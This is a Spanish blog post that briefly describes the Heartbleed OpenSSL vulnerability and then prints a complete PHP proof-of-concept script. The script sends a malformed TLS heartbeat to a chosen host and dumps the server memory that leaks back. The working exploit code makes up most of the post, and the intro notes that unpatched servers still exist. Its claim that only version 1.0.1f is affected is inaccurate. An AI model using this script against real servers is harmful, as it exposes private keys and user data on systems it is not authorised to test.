Explotar Heartbleed con PHP

Explotar Heartbleed con PHP

7:25 0 Comments A+ a-


Como ya sabrán, Heartbleed es un agujero de seguridad en la biblioteca de código abierto OpenSSL, solo vulnerable en su versión 1.0.1f, que permite a un atacante leer la memoria de un servidor o un cliente, permitiéndole por ejemplo, conseguir las claves privadas SSL de un servidor. Y es que, aunque esta vulnerabilidad ya tiene su "tiempo" y casi todos los servidores están actualizados, siempre hay algún despistado.


Código: PHP
  1. <?php
  2. /**
  3. * Heartbleed POC
  4. *
  5. * @author Zerquix18
  6. *
  7. * @link http://github.com/zerquix18/heartbleed
  8. *
  9. * NOTE: This is the translation of ssltest.py from python to PHP
  10. * Don't be evil...
  11. **/
  12. echo "--------PHP Heartbleed POC ---------------\n\n";
  14. if( 1 == $argc )
  15. exit("Usage: \"php ssltest.php url.com 443\"\n");
  16. array_shift($argv);
  17. $data = array(
  18. $argv[0],
  19. array_key_exists(1, $argv) && is_numeric($argv[1]) ? $argv[1] : 443
  20. );
  21. if( false == ($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) ) )
  22. exit("Unable to create socket!");
  23. function h2bin( $x ) {
  24. $x = str_replace( array(" ", "\n"), "", $x);
  25. return hex2bin($x);
  26. }
  27. $hello = h2bin("16 03 02 00 dc 01 00 00 d8 03 02 53
  28. 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
  29. bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
  30. 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
  31. 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
  32. c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
  33. c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
  34. c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
  35. c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
  36. 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
  37. 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
  38. 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
  39. 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
  40. 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
  41. 00 0f 00 01 01");
  42. $hb = h2bin("18 03 02 00 03
  43. 01 40 00");
  44. /**
  45. *
  46. * Thanks: http://stackoverflow.com/a/4225813/1932946
  47. **/
  48. function hexdump($data) {
  49. static $width = 16;
  50. static $pad = '.';
  51. static $from = '';
  52. static $to = '';
  53. if ($from==='')
  54. {
  55. for ($i=0; $i<=0xFF; $i++)
  56. {
  57. $from .= chr($i);
  58. $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;
  59. }
  60. }
  61. $hex = str_split(bin2hex($data), $width*2);
  62. $chars = str_split(strtr($data, $from, $to), $width);
  63. $offset = 0;
  64. foreach ($hex as $i => $line) {
  65. echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . "]\n";
  66. $offset += $width;
  67. }
  68. }
  69. function recvall($length, $timeout = 5) {
  70. global $s;
  71. $endtime = time() + $timeout;
  72. $rdata = "";
  73. $remain = $length;
  74. while($remain > 0) {
  75. $rtime = $endtime - $timeout;
  76. if( $rtime < 0 )
  77. return null;
  78. $e = NULL;
  79. $r = array($s);
  80. @socket_select( $r, $w, $e, 5);
  81. if( in_array($s, $r) ) {
  82. $d = @socket_recv($s, $data, $remain, 0 );
  83. if( false == $data )
  84. return null;
  85. $rdata .= $data;
  86. $remain -= strlen($data);
  87. }
  88. }
  89. return $rdata;
  90. }
  91. function recvmsg() {
  92. global $s;
  93. $hdr = recvall(5);
  94. if( null === $hdr ):
  95. echo "Unexpected EOF receiving record header - server closed connection\n";
  96. return array(null, null, null);
  97. endif;
  98. list($typ, $ver, $ln) = array_values( unpack("Cn/n/nC", $hdr) );
  99. $pay = recvall($ln, 10);
  100. if( null === $pay ) {
  101. echo "Unexpected EOF receiving record payload - server closed connection\n";
  102. return array(null, null, null);
  103. }
  104. printf(" ... received message: type = %d, ver = %04x, length = %d\n", $typ, $ver, strlen($pay) );
  105. return array($typ, $ver, $pay);
  106. }
  107. function hit_hb() {
  108. global $hb, $s;
  109. socket_send($s, $hb, strlen($hb), 0);
  110. while( true ) {
  111. list($typ, $ver, $pay) = recvmsg();
  112. if( null === $typ )
  113. exit('No heartbeat response received, server likely not vulnerable');
  114. if( 24 == $typ ){
  115. echo "Received heartbeat response:\n";
  116. hexdump($pay);
  117. if( strlen($pay) > 3 )
  118. echo 'WARNING: server returned more data than it should - server is vulnerable!';
  119. else
  120. echo 'Server processed malformed heartbeat, but did not return any extra data.';
  121. return true;
  122. }
  123. if( 21 == $typ ) {
  124. echo "Received alert:\n";
  125. hexdump($pay);
  126. echo 'Server returned error, likely not vulnerable';
  127. return false;
  128. }
  129. }
  130. }
  131. echo "Connecting to socket...\n";
  132. $s_ = socket_connect( $s, $data[0], (int) $data[1] );
  133. if( ! $s )
  134. exit("Error [". socket_last_error() . "]: " . socket_strerror( socket_last_error() ) . "\n" );
  135. echo "Sending client hello...\n";
  136. @socket_send($s, $hello, strlen($hello), 0 );
  138. while( true ) {
  139. list($typ, $ver, $pay) = recvmsg();
  140. if( null == $typ )
  141. exit("Server closed conection without sending hello!\n");
  142. if( 22 == $typ && ord($pay[0]) == 0x0E )
  143. break;
  144. }
  145. echo "Sending heartbeat request...\n";
  147. @socket_send($s, $hb, strlen($hb), 0);
  148. hit_hb();


 O bien, lo pueden descargar desde aquí: https://github.com/Zerquix18/heartbleed/blob/master/ssltest.php


Autor:  Zerquix18

Suscribirse a: Enviar comentarios (Atom)